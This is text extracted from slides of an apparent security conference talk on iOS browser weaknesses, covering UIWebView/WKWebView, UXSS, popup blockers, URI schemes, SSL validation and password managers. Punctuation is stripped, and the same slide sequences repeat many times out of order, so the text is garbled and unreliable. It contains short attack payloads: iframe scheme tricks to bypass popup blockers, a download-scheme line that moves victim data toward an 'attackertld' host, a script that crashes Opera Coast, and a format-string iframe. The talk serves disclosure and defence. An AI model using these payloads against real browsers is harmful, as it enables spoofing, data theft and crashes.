bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
